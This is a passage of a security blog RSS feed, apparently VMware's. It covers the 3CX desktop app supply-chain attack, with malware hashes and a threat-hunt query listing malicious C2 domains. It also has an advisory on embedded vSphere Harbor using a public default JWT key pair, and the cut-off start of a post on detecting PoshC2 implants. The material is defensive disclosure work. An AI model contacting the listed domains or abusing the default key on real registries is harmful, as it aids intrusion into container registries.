data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}"
aria-setsize="-1" data-aria-posinset="17" data-aria-level="1"><span
data-contrast="none">5407cda7d3a75e7b1e030b1f33337a56f293578ffa8b3ae19c671051ed314290</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="4"
data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}"
aria-setsize="-1" data-aria-posinset="18" data-aria-level="1"><span
data-contrast="none">fee4f9dabc094df24d83ec1a8c4e4ff573e5d9973caa676f58086c99561382d7</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="4"
data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}"
aria-setsize="-1" data-aria-posinset="19" data-aria-level="1"><span
data-contrast="none">e6bbc33815b9f20b0cf832d7401dd893fbc467c800728b5891336706da0dbcec</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="4"
data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}"
aria-setsize="-1" data-aria-posinset="20" data-aria-level="1"><span
data-contrast="none">a64fa9f1c76457ecc58402142a8728ce34ccba378c17318b3340083eeb7acc67</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="4"
data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}"
aria-setsize="-1" data-aria-posinset="21" data-aria-level="1"><span
data-contrast="none">b86c695822013483fa4e2dfdf712c5ee777d7b99cbad8c2fa2274b133481eadb</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="4"
data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}"
aria-setsize="-1" data-aria-posinset="22" data-aria-level="1"><span
data-contrast="none">fd15a9619987925827ede24efa8990c3680c9c0b4a76eb1c43031de39c1b7ae1</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="4"
data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}"
aria-setsize="-1" data-aria-posinset="23" data-aria-level="1"><span
data-contrast="none">9a47c9a3f7cf26ddc1fdb90dc48d30d69448e6d8ab64cc57dcb285c6b9d846c3</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="4"
data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}"
aria-setsize="-1" data-aria-posinset="24" data-aria-level="1"><span
data-contrast="none">92005051ae314d61074ed94a52e76b1c3e21e7f0e8c1d1fdd497a006ce45fa61</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="4"
data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}"
aria-setsize="-1" data-aria-posinset="25" data-aria-level="1"><span
data-contrast="none">c649e7c1897bfd30aad85c6b6736fcb2d002a7eaf64186eea00c1a44d6220803</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="4"
data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}"
aria-setsize="-1" data-aria-posinset="26" data-aria-level="1"><span
data-contrast="none">fdad2f34e466782e4b272d3f8505c49c3bb6269c8d5fd8846f0cc399f9744cba</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="4"
data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}"
aria-setsize="-1" data-aria-posinset="27" data-aria-level="1"><span
data-contrast="none">87c5d0c93b80acf61d24e7aaf0faae231ab507ca45483ad3d441b5d1acebc43c</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></li>
</ul> <p><b><span data-contrast="auto">How can you protect your organization?
</span></b><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></p>
<p><span data-contrast="none">3CX has </span><a
href="https://www.3cx.com/blog/news/desktopapp-security-alert-updates/"><span
data-contrast="none">provided mitigation guidance</span></a><span
data-contrast="none">, which includes a recommendation to uninstall the 3CX
desktop app. As of this writing, an updated desktop app was being prepared by
3CX. </span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></p>
<p><span data-contrast="none">One of the biggest challenges with supply chain
attacks is that they are challenging to detect. Because the attack occurs
through a third-party vendor, the business may not even be aware that an attack
has taken place until it is too late. Organizations can minimize overall risk of
a supply chain attack by following security best practices. These
include:</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></p>
<ul> <li data-leveltext="" data-font="Symbol" data-listid="2"
data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}"
aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><span
data-contrast="none">Developing a robust security strategy that encompasses the
entire supply chain. This means conducting thorough security checks on all
vendors, ensuring that they have appropriate security measures in place, and
regularly monitoring their systems for any potential threats.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="2"
data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}"
aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><span
data-contrast="none">Implementing endpoint and network security solutions that
can detect and respond to threats in real-time, as well as advanced threat
detection solutions that can identify potential anomalous threats as they
occur.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="2"
data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}"
aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><span
data-contrast="none">Ensuring a solid incident response plan is in place in case
of a supply chain attack. This includes identifying the key stakeholders who
need to be notified, as well as having a clear process in place for containing
and mitigating the attack.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"><br
/> </span></li> </ul> <p><span data-contrast="none">By taking these steps,
businesses can reduce the risk of a supply chain attack and ensure the safety
and security of their operations and customers.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></p>
<p><b><span data-contrast="auto">How can VMware security products
help?</span></b><span data-contrast="auto"> </span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></p>
<ul> <li data-leveltext="-" data-font="Calibri" data-listid="1"
data-list-defn-props="{&quot;335551671&quot;:0,&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Calibri&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;-&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}"
aria-setsize="-1" data-aria-posinset="0" data-aria-level="1"><span
data-contrast="auto">The hashes listed in this blog post have a known malware
reputation and should be blocked automatically by </span><b><span
data-contrast="auto">Carbon Black Cloud</span></b><span
data-contrast="auto">.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></li>
<li data-leveltext="-" data-font="Calibri" data-listid="1"
data-list-defn-props="{&quot;335551671&quot;:0,&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Calibri&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;-&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}"
aria-setsize="-1" data-aria-posinset="0" data-aria-level="1"><b><span
data-contrast="auto">Carbon Black EDR</span></b><span data-contrast="auto">
customers can search for netconn traffic to the domains listed in this blog
post.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></li>
<li data-leveltext="-" data-font="Calibri" data-listid="1"
data-list-defn-props="{&quot;335551671&quot;:0,&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Calibri&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;-&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}"
aria-setsize="-1" data-aria-posinset="0" data-aria-level="1"><b><span
data-contrast="auto">Carbon Black App Control</span></b><span
data-contrast="auto"> customers can ban the hashes listed in this blog
post.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></li>
<li data-leveltext="-" data-font="Calibri" data-listid="1"
data-list-defn-props="{&quot;335551671&quot;:0,&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Calibri&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;-&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}"
aria-setsize="-1" data-aria-posinset="0" data-aria-level="1"><span
data-contrast="auto">Carbon Black customers can also find additional product
related details and instructions by logging on to the user community and
accessing this link: <a
href="https://community.carbonblack.com/t5/Threat-Research-Docs/3CX-Compromise-a-k-a-Smooth-Operator/ta-p/117836"
target="_blank" rel="noopener">HERE</a></span></li> <li data-leveltext="-"
data-font="Calibri" data-listid="1"
data-list-defn-props="{&quot;335551671&quot;:0,&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Calibri&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;-&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}"
aria-setsize="-1" data-aria-posinset="0" data-aria-level="1"><span
data-contrast="auto">For </span><b><span data-contrast="auto">NSX Advanced
Threat Prevention</span></b><span data-contrast="auto"> (ATP), all published
indicators are currently detected as malicious. Where guest virtual machines are
protected by the Distributed Malware Prevention Service leveraging Guest
Introspection, all malicious DLL files associated with this threat can be
mitigated with a &#8216;detect and prevent&#8217; malware prevention profile
(</span><span data-contrast="auto">Figure 2</span><span data-contrast="auto">
shows how </span><b><span data-contrast="auto">NSX ATP </span></b><span
data-contrast="auto">detect the malicious DLLs through Guest Introspection).
</span><b><span data-contrast="auto">NSX ATP</span></b><span
data-contrast="auto"> has also anomaly-based detectors specifically tailored to
identify anomalous beaconing; the malicious domains associated with
3CXDesktopApp are now part of the network reputation feed provided by
</span><b><span data-contrast="auto">NSX ATP</span></b><span
data-contrast="auto">.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></li>
</ul> <p><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"><a
href="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-31-at-9.49.15-AM.png"><img
decoding="async" loading="lazy" class="alignnone size-large wp-image-83436"
src="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-31-at-9.49.15-AM-1024x467.png"
alt="" width="1024" height="467"
srcset="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-31-at-9.49.15-AM-1024x467.png
1024w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-31-at-9.49.15-AM-300x137.png
300w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-31-at-9.49.15-AM-768x351.png
768w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-31-at-9.49.15-AM-1536x701.png
1536w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-31-at-9.49.15-AM-2048x935.png
2048w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-31-at-9.49.15-AM-600x274.png
600w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></span></p> <p><i><span
data-contrast="none">Figure </span></i><i><span
data-contrast="none">2</span></i><i><span data-contrast="none">: User interface
of NSX Guest Introspection Malware Prevention Service.</span></i><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:200,&quot;335559740&quot;:240}"> </span></p>
<ul> <li data-leveltext="-" data-font="Calibri" data-listid="1"
data-list-defn-props="{&quot;335551671&quot;:0,&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Calibri&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;-&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}"
aria-setsize="-1" data-aria-posinset="0" data-aria-level="1"><b><span
data-contrast="auto">NSX ATP Standalone</span></b><span data-contrast="auto">
customers can also increase upload limits to support analyzing large files (up
to 100MB on on-premise, see the following article for instructions on how to
change this: </span><a href="https://kb.vmware.com/s/article/900100?lang=en_US"
target="_blank" rel="noopener">INSTRUCTIONS</a><span data-contrast="auto">), and
threat hunt for the associated malicious network activity via the Network
Explore console using the following search query: </span><i><span
data-contrast="auto">“akamaicontainer.com OR akamaitechcloudservices.com OR
azuredeploystore.com OR azureonlinecloud.com OR azureonlinestorage.com OR
dunamistrd.com OR glcloudservice.com OR journalide.org OR msedgepackageinfo.com
OR msstorageazure.com OR msstorageboxes.com OR officeaddons.com OR
officestoragebox.com OR pbxcloudeservices.com OR pbxphonenetwork.com OR
pbxsources.com OR sbmsa.wiki OR sourceslabs.com OR visualstudiofactory.com OR
zacharryblogs.com OR  </span></i><span
data-contrast="none">qwepoi123098.com</span><i><span
data-contrast="auto">”.</span></i><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></li>
</ul> <p><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p><p>The
post <a rel="nofollow"
href="https://blogs.vmware.com/security/2023/03/investigating-3cx-desktop-application-attacks-what-you-need-to-know.html">Investigating
3CX Desktop Application Attacks: What You Need to Know</a> appeared first on <a
rel="nofollow" href="https://blogs.vmware.com/security">VMware Security
Blog</a>.</p> ]]>
...
</content:encoded>
...
</item>
<item>
<title>Embedded vSphere Harbor default enablement results in an insecure
configuration</title>
<link>https://blogs.vmware.com/security/2023/03/embedded-vsphere-harbor-default-enablement-results-in-an-insecure-configuration.html?utm_source=rss&utm_medium=rss&utm_campaign=embedded-vsphere-harbor-default-enablement-results-in-an-insecure-configuration</link>
<dc:creator>
<![CDATA[ Monty Ijzerman ]]>
...
</dc:creator>
<pubDate>Fri, 31 Mar 2023 05:23:42 +0000</pubDate>
<category>
<![CDATA[ VMware Security Response Center ]]>
...
</category>
<guid isPermaLink="false">https://blogs.vmware.com/security/?p=83429</guid>
<description>
<![CDATA[ <div><img width="300" height="158"
src="https://blogs.vmware.com/security/files/2022/08/150DPIx-AdobeStock_192613311-300x158.jpg"
class="attachment-medium size-medium wp-post-image" alt="Server Advanced
Workload Protection" decoding="async" loading="lazy" style="margin-bottom:
10px;"
srcset="https://blogs.vmware.com/security/files/2022/08/150DPIx-AdobeStock_192613311-300x158.jpg
300w,
https://blogs.vmware.com/security/files/2022/08/150DPIx-AdobeStock_192613311-1024x540.jpg
1024w,
https://blogs.vmware.com/security/files/2022/08/150DPIx-AdobeStock_192613311-768x405.jpg
768w,
https://blogs.vmware.com/security/files/2022/08/150DPIx-AdobeStock_192613311-1536x810.jpg
1536w,
https://blogs.vmware.com/security/files/2022/08/150DPIx-AdobeStock_192613311-600x317.jpg
600w,
https://blogs.vmware.com/security/files/2022/08/150DPIx-AdobeStock_192613311.jpg
1600w" sizes="(max-width: 300px) 100vw, 300px" /></div> <p>This post is relevant
to administrators that have enabled the embedded Harbor version in vSphere 7.0
or 8.0 as explained in Enable the Embedded Harbor Registry on the Supervisor
Cluster. Harbor-helm issue Harbor when installed with harbor-helm will use a
default key pair if no key pair is specified in core.secretName in values.yaml.
This default &#8230; <a
href="https://blogs.vmware.com/security/2023/03/embedded-vsphere-harbor-default-enablement-results-in-an-insecure-configuration.html">Continued</a></p>
<p>The post <a rel="nofollow"
href="https://blogs.vmware.com/security/2023/03/embedded-vsphere-harbor-default-enablement-results-in-an-insecure-configuration.html">Embedded
vSphere Harbor default enablement results in an insecure configuration</a>
appeared first on <a rel="nofollow"
href="https://blogs.vmware.com/security">VMware Security Blog</a>.</p> ]]>
...
</description>
<content:encoded>
<![CDATA[ <div><img width="300" height="158"
src="https://blogs.vmware.com/security/files/2022/08/150DPIx-AdobeStock_192613311-300x158.jpg"
class="attachment-medium size-medium wp-post-image" alt="Server Advanced
Workload Protection" decoding="async" loading="lazy" style="margin-bottom:
10px;"
srcset="https://blogs.vmware.com/security/files/2022/08/150DPIx-AdobeStock_192613311-300x158.jpg
300w,
https://blogs.vmware.com/security/files/2022/08/150DPIx-AdobeStock_192613311-1024x540.jpg
1024w,
https://blogs.vmware.com/security/files/2022/08/150DPIx-AdobeStock_192613311-768x405.jpg
768w,
https://blogs.vmware.com/security/files/2022/08/150DPIx-AdobeStock_192613311-1536x810.jpg
1536w,
https://blogs.vmware.com/security/files/2022/08/150DPIx-AdobeStock_192613311-600x317.jpg
600w,
https://blogs.vmware.com/security/files/2022/08/150DPIx-AdobeStock_192613311.jpg
1600w" sizes="(max-width: 300px) 100vw, 300px" /></div><p>This post is relevant
to administrators that have enabled the embedded Harbor version in vSphere 7.0
or 8.0 as explained in <a
href="https://docs.vmware.com/en/VMware-vSphere/7.0/vmware-vsphere-with-tanzu/GUID-AE24CF79-3C74-4CCD-B7C7-757AD082D86A.html#GUID-AE24CF79-3C74-4CCD-B7C7-757AD082D86A">Enable
the Embedded Harbor Registry on the Supervisor Cluster</a>.</p>
<p><strong>Harbor-helm issue</strong><br /> Harbor when installed with
harbor-helm will use a default key pair if no key pair is specified in
core.secretName in values.yaml. This default key pair is public and can be used
to sign the JWT token. This token allows for pulling and pushing images in
Harbor. See here for the <a
href="https://github.com/goharbor/harbor/security/advisories/GHSA-j7jh-fmcm-xxwv">Harbor-helm
advisory</a> which documents the issue.</p> <p><strong>vSphere</strong><br />
The embedded Harbor registry on a vSphere Supervisor has an insecure
configuration due to the Harbor-helm issue. Normally, projects on an embedded
Harbor registry are private and 1:1 mapped to Supervisor namespaces, and only
users with proper permissions to Supervisor namespaces can pull / push images to
the corresponding Harbor projects. However, this issue can break the isolation
and protection of the container image access in those projects.<br /> The issue
is present in all current versions of vSphere prior to vCenter Server 7.0 U3l
and vCenter Server 8.0c that have the embedded Harbor enabled and that have not
changed the default configuration.</p> <p><strong>Existing enabled embedded
Harbor registry in vSphere</strong><br /> VMware advises customers that have
enabled the embedded Harbor version in vSphere and that have not changed the
default configuration, to:<br /> &#8211; Deploy vCenter Server 7.0 U3l or
vCenter Server 8.0c which address the issue for existing embedded Harbor
registries that are enabled by removing the default key pair, or<br /> &#8211;
Change the default configuration by following the temporary workaround steps
listed in <a href="http://kb.vmware.com/kb/91452">VMware Knowledge Base article
91452</a>.</p> <p><strong>Newly enabled embedded Harbor in vSphere</strong><br
/> In case the embedded Harbor registry is enabled on vCenter Server 7.0 U3l or
vCenter Server 8.0c, the issue is not present.</p> <p><strong>Note</strong><br
/> The VMware Harbor Container Registry for Tanzu Kubernetes Grid Integrated
Edition is not installed through Harbor-helm and therefor it doesn’t have the
Harbor insecure default installation.</p> <p><strong>Acknowledgement</strong><br
/> VMware would like to thank Sam Erb from Google for reporting this issue to
us.</p><p>The post <a rel="nofollow"
href="https://blogs.vmware.com/security/2023/03/embedded-vsphere-harbor-default-enablement-results-in-an-insecure-configuration.html">Embedded
vSphere Harbor default enablement results in an insecure configuration</a>
appeared first on <a rel="nofollow"
href="https://blogs.vmware.com/security">VMware Security Blog</a>.</p> ]]>
...
</content:encoded>
...
</item>
<item>
<title>How to Detect PoshC2 PowerShell Implants</title>
<link>https://blogs.vmware.com/security/2023/03/how-to-detect-poshc2-powershell-implants.html?utm_source=rss&utm_medium=rss&utm_campaign=how-to-detect-poshc2-powershell-implants</link>
<dc:creator>
<![CDATA[ Oleg Boyarchuk ]]>
...
</dc:creator>
<pubDate>Fri, 24 Mar 2023 21:03:01 +0000</pubDate>
<category>
<![CDATA[ Threat Analysis Unit ]]>
...
</category>
<guid isPermaLink="false">https://blogs.vmware.com/security/?p=83405</guid>
<description>
<![CDATA[ <div><img width="300" height="157"
src="https://blogs.vmware.com/security/files/2021/04/VMWCB-BlogFeature-PowershellRSP-02-4-300x157.png"
class="attachment-medium size-medium wp-post-image" alt="" decoding="async"
loading="lazy" style="margin-bottom: 10px;"
srcset="https://blogs.vmware.com/security/ ]]>
<![CDATA[ files/2021/04/VMWCB-BlogFeature-PowershellRSP-02-4-300x157.png 300w,
https://blogs.vmware.com/security/files/2021/04/VMWCB-BlogFeature-PowershellRSP-02-4-1024x535.png
1024w,
https://blogs.vmware.com/security/files/2021/04/VMWCB-BlogFeature-PowershellRSP-02-4-768x402.png
768w, https://blogs.vmware.co ]]>
<![CDATA[
m/security/files/2021/04/VMWCB-BlogFeature-PowershellRSP-02-4-600x314.png 600w,
https://blogs.vmware.com/security/files/2021/04/VMWCB-BlogFeature-PowershellRSP-02-4.png
1201w" sizes="(max-width: 300px) 100vw, 300px" /></div> <p>PoshC2 is a
proxy-aware cross-platform C2 framework that natively supports Docker.  Once
configured and executed, it generates over 100 modifications of fresh implants,
written in PowerShell, C#, and Python. The framework has a modular architecture
to enable users to add their own modules and tools. No wonder, that nowadays
PoshC2 is one of the most &#8230; <a
href="https://blogs.vmware.com/security/2023/03/how-to-detect-poshc2-powershell-implants.html">Continued</a></p>
<p>The post <a rel="nofollow"
href="https://blogs.vmware.com/security/2023/03/how-to-detect-poshc2-powershell-implants.html">How
to Detect PoshC2 PowerShell Implants</a> appeared first on <a rel="nofollow"
href="https://blogs.vmware.com/security">VMware Security Blog</a>.</p> ]]>
...
</description>
<content:encoded>
<![CDATA[ <div><img width="300" height="157"
src="https://blogs.vmware.com/security/files/2021/04/VMWCB-BlogFeature-PowershellRSP-02-4-300x157.png"
class="attachment-medium size-medium wp-post-image" alt="" decoding="async"
loading="lazy" style="margin-bottom: 10px;"
srcset="https://blogs.vmware.com/security/ ]]>
<![CDATA[ files/2021/04/VMWCB-BlogFeature-PowershellRSP-02-4-300x157.png 300w,
https://blogs.vmware.com/security/files/2021/04/VMWCB-BlogFeature-PowershellRSP-02-4-1024x535.png
1024w,
https://blogs.vmware.com/security/files/2021/04/VMWCB-BlogFeature-PowershellRSP-02-4-768x402.png
768w, https://blogs.vmware.co ]]>
<![CDATA[
m/security/files/2021/04/VMWCB-BlogFeature-PowershellRSP-02-4-600x314.png 600w,
https://blogs.vmware.com/security/files/2021/04/VMWCB-BlogFeature-PowershellRSP-02-4.png
1201w" sizes="(max-width: 300px) 100vw, 300px" /></div><p><span
data-contrast="auto">PoshC2 is a proxy-aware cross-platform C2 fram ]]>
<![CDATA[ ework that natively supports Docker.  Once configured and
executed</span><b><span data-contrast="auto">, </span></b><span
data-contrast="auto">it generates over 100 modifications of fresh implants,
written in PowerShell, C#, and Python. The framework has a modular architecture
to enable users to ad ]]>
<![CDATA[ d their own modules and tools. No wonder, that nowadays PoshC2 is
</span><a
href="https://twitter.com/teamcymru_s2/status/1604091964386705409"><span
data-contrast="none">one of the</span></a><span data-contrast="auto"> most
popular C2 frameworks, and it is routinely used to aid penetration testers w ]]>
<![CDATA[ ith red teaming, post-exploitation, and lateral movement
capabilities.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p><span data-contrast="auto">In May 2020, Nettitude, the creator and the
maintainer of PoshC2 </span><a hre ]]>
<![CDATA[ f="https://labs.nettitude.com/blog/introducing-poshc2-v6-0/"><span
data-contrast="none">released</span></a><span data-contrast="auto"> the
6</span><span data-contrast="auto">th</span><span data-contrast="auto"> version
of the framework. Shortly thereafter, Nettitude also </span><a
href="https://labs ]]>
<![CDATA[ .nettitude.com/blog/detecting-poshc2-indicators-of-compromise/"><span
data-contrast="none">published</span></a><span data-contrast="auto"> techniques
that could be used to detect its footprint, including communication of the
implant with the backend, the behavior of the implant during execution, and ]]>
